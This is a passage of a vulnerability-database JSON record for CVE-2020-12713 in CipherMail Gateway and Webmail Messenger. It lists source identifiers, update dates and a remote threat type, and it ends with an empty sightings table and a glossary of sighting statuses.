"db": "NVD",
"id": "CVE-2020-12713"
},
{
"date": "2020-06-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-822"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-22T00:00:00",
"db": "VULHUB",
"id": "VHN-165419"
},
{
"date": "2020-06-22T00:00:00",
"db": "VULHUB",
"id": "VHN-165420"
},
{
"date": "2020-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-006804"
},
{
"date": "2020-06-22T18:09:03.423000",
"db": "NVD",
"id": "CVE-2020-12713"
},
{
"date": "2020-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-822"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "158001"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-822"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CipherMail Gateway and Webmail Messenger Vulnerability related to authority management in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-006804"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202006-822"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.